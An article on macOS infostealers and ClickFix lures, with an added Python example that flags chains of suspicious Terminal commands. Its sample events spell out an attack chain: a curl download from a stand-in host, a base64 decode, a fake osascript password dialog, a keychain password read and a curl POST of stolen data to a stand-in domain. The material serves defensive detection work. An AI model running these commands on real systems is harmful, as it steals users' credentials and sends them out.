
The expansion of cross-platform infostealers to macOS threatens enterprise Mac fleets, exposes sensitive credentials, and opens the door to broader supply-chain attacks, forcing organizations to rethink their macOS security strategies.
Apple’s macOS has long been perceived as a lower-risk platform than Windows, but the tide is turning. Recent telemetry from Microsoft Defender shows a marked increase in cross-platform infostealers that take advantage of the growing presence of Python and other language runtimes on macOS. Threat actors are repurposing code bases originally written for Windows, packaging them for macOS, and bundling them into seemingly benign DMG installers. This shift reflects a broader trend: attackers favor languages whose code runs unchanged across operating systems, so they can expand their toolkits to a new platform without rewriting core functionality.
The campaigns rely heavily on social engineering. Malicious Google Ads, SEO-poisoned pages, and “ClickFix” prompts that instruct the victim to copy and paste a command into Terminal lure users into running unsigned scripts or installing fake updates. Once on the system, the malware uses native macOS utilities (AppleScript via osascript, curl, and keychain queries) to harvest browser passwords, cryptocurrency wallets, and developer credentials. Payloads disguised as trusted applications such as WhatsApp and PDF editors further obscure their origin, while Python-based components such as PXA Stealer allow fileless execution and easy evasion of signature-based defenses. The result is a potent mix of credential theft, financial fraud, and potential footholds for deeper enterprise compromise.
Defending against this evolving threat requires a layered approach. Microsoft recommends enabling cloud-delivered protection, enforcing attack surface reduction rules (on the platforms that support them), and running endpoint detection and response (EDR) in block mode to stop unsigned scripts and suspicious executables. Organizations should monitor for anomalous Terminal activity, in particular base64 decoding, curl invocations, osascript/AppleScript launches, and keychain queries, and flag outbound POST requests to unknown domains. No single one of these is malicious on its own; it is the chain of several in a short span under one user that is the signal. User education remains critical: training staff to recognize fake ads, bogus installers, and copy-paste tricks cuts off the initial infection vector. As macOS becomes a more attractive target, enterprises must extend their security controls and visibility to cover cross-platform malware and platform-abuse tactics.
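The following is an added example, not Microsoft's code or anything from the page, showing how the Terminal indicators above can be correlated into a single alert. It runs over a constructed set of process-execution events (timestamp, parent process, command line, user) whose shape is an assumption, not a real EDR or unified-log format; the allow-list of domains and the alert threshold are likewise assumptions. The heuristics are deliberately narrow (macOS `base64 -D`/`-d`, `curl` with an output flag or POST body, `osascript`, `security find-*-password` with the print-password flags) so that ordinary developer activity such as `git pull` or a plain `curl` to an allowed API does not fire.

```python
"""Correlate ClickFix-style macOS infostealer indicators across process events.

Added example with constructed sample data; the event shape, the allow-list
and the threshold are assumptions for illustration.
"""
import re
import shlex
from collections import defaultdict

# Constructed sample events: (HH:MM:SS, parent process, command line, user).
# "alice" reproduces the chain from the article: download, decode, fake
# password dialog, keychain read, exfiltration. "bob" is normal dev activity.
SAMPLE_EVENTS = [
    ("10:01:02", "Terminal", "curl -fsSL https://update-check.example/x.sh -o /tmp/x.sh", "alice"),
    ("10:01:03", "Terminal", "sh /tmp/x.sh", "alice"),
    ("10:01:04", "sh", "base64 -D -i /tmp/p.b64 -o /tmp/p", "alice"),
    ("10:01:05", "sh", "osascript -e 'display dialog \"Update required\" default answer \"\" with hidden answer'", "alice"),
    ("10:01:06", "sh", "security find-generic-password -ga Chrome", "alice"),
    ("10:01:08", "python3", "curl -X POST -d @/tmp/out.zip https://cdn-metrics.example/upload", "alice"),
    ("11:30:00", "Terminal", "curl -sS https://api.github.com/repos/x/y/releases", "bob"),
    ("11:30:01", "Terminal", "git pull", "bob"),
]

ALLOWED_DOMAINS = {"api.github.com"}  # assumed corporate allow-list


def _host(cmd):
    """Extract the host of the first http(s) URL in a command line, if any."""
    m = re.search(r"https?://([^/\s'\"]+)", cmd)
    return m.group(1).lower() if m else None


def classify(cmdline):
    """Return the set of indicator names a single command line matches."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        argv = cmdline.split()
    if not argv:
        return set()
    prog, args = argv[0].rsplit("/", 1)[-1], argv[1:]
    hits = set()
    # macOS base64 decodes with -D (older) or -d/--decode (newer).
    if prog == "base64" and any(a in ("-D", "-d", "--decode") for a in args):
        hits.add("base64_decode")
    if prog == "curl":
        host = _host(cmdline)
        if any(a in ("-o", "-O", "--output", "--remote-name") for a in args):
            hits.add("curl_download")
        is_post = ("-X" in args and "POST" in args) or any(
            a in ("-d", "-F", "--form") or a.startswith("--data") for a in args)
        if is_post and host and host not in ALLOWED_DOMAINS:
            hits.add("curl_post_unknown_domain")
    if prog == "osascript":
        hits.add("osascript_launch")
        if "hidden answer" in cmdline:  # AppleScript password-style dialog
            hits.add("osascript_password_prompt")
    if prog == "security":
        wants_password = any(a.startswith("find-") and a.endswith("-password") for a in args)
        # -g prints the password to stderr, -w prints only the password; both
        # may be combined with other single-letter flags, e.g. "-ga".
        prints_secret = any(a.startswith("-") and not a.startswith("--")
                            and ("g" in a[1:] or "w" in a[1:]) for a in args)
        if wants_password and prints_secret:
            hits.add("keychain_password_read")
    return hits


def _secs(ts):
    h, m, s = (int(x) for x in ts.split(":"))
    return h * 3600 + m * 60 + s


def correlate(events, window=300, threshold=3):
    """Per user, find the largest set of distinct indicators within any
    `window`-second span; return {user: sorted indicators} for users whose
    best span reaches `threshold` distinct indicators."""
    by_user = defaultdict(list)
    for ts, _parent, cmd, user in events:
        ind = classify(cmd)
        if ind:
            by_user[user].append((_secs(ts), ind))
    alerts = {}
    for user, seq in by_user.items():
        seq.sort(key=lambda e: e[0])
        best = set()
        for i, (t0, _) in enumerate(seq):
            seen = set()
            for t, ind in seq[i:]:
                if t - t0 > window:
                    break
                seen |= ind
            if len(seen) > len(best):
                best = seen
        if len(best) >= threshold:
            alerts[user] = sorted(best)
    return alerts


if __name__ == "__main__":
    for user, indicators in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {user}: {', '.join(indicators)}")
```

In production the same logic would sit on a stream of process events rather than a list, and the allow-list would come from proxy or DNS telemetry; the point is that the chain (download, decode, prompt, keychain read, upload) is far more specific than any individual command.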